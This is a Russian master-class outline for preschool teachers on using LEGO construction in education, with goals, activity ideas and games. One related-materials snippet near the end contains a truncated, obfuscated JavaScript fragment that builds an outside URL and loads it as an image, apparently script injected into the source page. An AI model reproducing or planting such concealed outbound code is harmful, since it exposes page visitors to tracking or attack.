Мастер класс «Использование ЛЕГО - конструирования в образовательной работе с дошкольниками»
методическая разработка по конструированию, ручному труду на тему
Предварительный просмотр:
Мастер класс «Использование ЛЕГО - конструирования в образовательной работе с дошкольниками»
Цель: повышение профессионального мастерства педагогов-участников мастер-класса в процессе активного педагогического общения по ЛЕГО-конструированию.
Задачи:
-обучение участников мастер-класса способам применения ЛЕГО - конструктора;
-воссоздание технологий работы в области ЛЕГО-конструирования;
-формирование у участников мастер-класса мотивации к использованию в образовательной деятельности ЛЕГО-конструктора;
-популяризация инновационных технологий.
Оборудование и материалы: конструктор ЛЕГО.
Планируемый результат:
-активизация познавательной деятельности участников;
-информирование о системе работы по лего-конструированию с детьми дошкольного возраста;
-практическое освоение педагогами конструктивными навыками в рамках транслируемого опыта.
«Конструируя,
ребенок действует, как зодчий,
возводящий здание собственного
потенциала»
Ж. Пиаже
В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых педагогических технологий, методик, различных видов дидактического материала. Наиболее популярным оборудованием на сегодняшний день считаются материалы Лего, в которые входят различные виды конструкторов.
Британская ассоциация торговцев игрушками присвоила конструктору звание «Игрушка столетия».
Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкновенное чудо: интерес к нему не затухает много десятилетий — с момента его появления в Дании в 1949 году.
С того дня и вплоть до настоящего времени Лего (LEGO) ни разу не изменил своему девизу «Играй с удовольствием».
У слова Лего два значения: «я учусь» и «я складываю.
В педагогике Лего-технология интересна тем, что, строясь на интегрированных принципах, объединяет в себе элементы игры и экспериментирования.
Вопрос аудитории:
- Давайте дадим лучшему в мире конструктору небольшую характеристику.
Безопасность.
Широкие игровые возможности.
Польза. Развивает воображение, творческие способности, логическое мышление.
Подходит для любого сезона.
Универсальность. Подходит для всех возрастов: для девочек и мальчиков и даже взрослых.
Легкий сбор и разбор конструкций.
Это возможность коллективной игры.
Образовательные области в ДОУ не существуют в «чистом виде». Всегда происходит их интеграция, а с помощью применения Лего-конструирования легко можно интегрировать познавательное развитие, куда и входит техническое конструирование с художественно-эстетическим развитием, когда мы говорим о творческом конструировании, с социально – коммуникативным развитием, речевым и физическим. Посредством использования Лего-конструкторов можно эффективно решать образовательные задачи.
Я попытаюсь сегодня познакомить вас с некоторыми из вариантов применения лего - конструирования в различных образовательных областях.
Социально-коммуникативное развитие.
На мой взгляд, одна из основных целей в лего-конструировании – научить детей эффективно работать вместе, создавать совместные постройки, объединенные одной идеей, одним проектом. Сегодня, с введением ФГОС, совместное освоение знаний и развитие умений, интерактивный характер взаимодействия востребованы как никогда раньше.
Познавательное развитие
В процессе лего-конструирования у дошкольников развиваются математические способности и формируются сенсорные представления:
Происходит знакомство с такими пространственными показателями, как симметричность и асимметричность, ориентировка в пространстве. Лего формирует пространственное мышление, развивает умение применять свои знания при проектировании и сборке конструкций, развивает логическое мышление.
Речевое развитие.
Тренируя пальцы, мы оказываем мощное воздействие на работоспособность коры головного мозга, а, следовательно, и на развитие речи. В процессе конструирования из Лего, дети общаются, договариваются, рассуждают, учатся отстаивать свою точку зрения, при этом расширяется словарный запас, умение задавать вопросы, развиваются диалогическая и монологическая речь.
Можно применять Лего и в процессе подготовки к обучению грамоте:
-предложить составить образ буквы из кирпичиков Лего;
-построить различные предметы, которые начинаются с указанного звука;
-выложить столько кирпичиков Лего на наборное полотно, сколько они слышат слов в данном предложении.
Художественно-эстетическое развитие
Лего - конструктор приходит на помощь при подготовке к детской театральной постановке. Сначала дети создают своих героев из конструктора, а затем озвучивают их.
Физическое развитие
Помимо мелкой моторики обеих рук Лего – конструирование также способствует развитию крупной моторики. Конструктор Лего можно использовать как инвентарь для проведения занятий по физической культуре.
Практическая часть
Лего – умная игра,
Увлекательна, хитра!
Интересно здесь играть,
Строить, составлять, искать!
Приглашаю всех друзей
В Лего поиграть скорей!
Тут не только интересно!
В Лего поиграть полезно!
«Светофор».
Педагог раздаёт участникам кирпичики трёх цветов и предлагает посоревноваться - кто больше составит различных светофоров, то есть требуется, чтобы кирпичики желтого, красного и зелёного цвета стояли в различном порядке. После выявления победителя педагог демонстрирует шесть комбинаций светофоров и объясняет систему, по которой надо было их составлять, чтобы не пропустить ни одного варианта.
«Придумай свою историю»
Разделиться на творческие группы. Предложить наборы конструктора, дать задание: несколько слов. Нужно придумать и построить с этими словами историю. Например: слова (забор, мост, качели; моделируют историю с этими словами). Например: «Жила-была девочка. Однажды она пошла, гулять, а дорога проходила через мост. Но девочке одной было скучно, и она пригласила друга. Вместе они отправились на детскую площадку. И т. д.).» У следующей группы может быть другая история.
Рефлексия
Задание «Выбери цвет конструктора Лего»
• Если всё понятно и интересно - красный кубик
• Если понятно, но не очень интересно - жёлтый.
• Если не понятно, не интересно - зелёный.
Заключение
Таким образом, можно сделать вывод: конструктор ЛЕГО является великолепным средством, помогающим обеспечить интеграцию различных видов деятельности и образовательных областей. Кроме этого, Лего - конструирование - эффективное воспитательное средство, которое помогает объединить усилия педагогов и семьи в решении вопроса воспитания и развития ребенка. В совместной игре с родителями ребенок становится более усидчивым, работоспособным, целеустремленным, эмоционально отзывчивым.
Спасибо, уважаемые коллеги, за внимание и сотрудничество!
По теме: методические разработки, презентации и конспекты
мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста, формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....
Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"
Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...
Мастер-класс "Использование лего-конструирования в образовательной работе с дошкольниками"
мастер-класс...
МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"
МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...
Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»
В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...
МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками
Цель: повышение профессионального мастерства педагогов-участников мастер-классе по ЛЕГО-конструированию в процессе активного педагогического общения.Задачи:обучать участников мастер-класса навыкам при...
МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками
Добрый день, уважаемые гости. Сегодня на мастер-классе я хотела бы познакомить Лего-конструированием. Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкнове...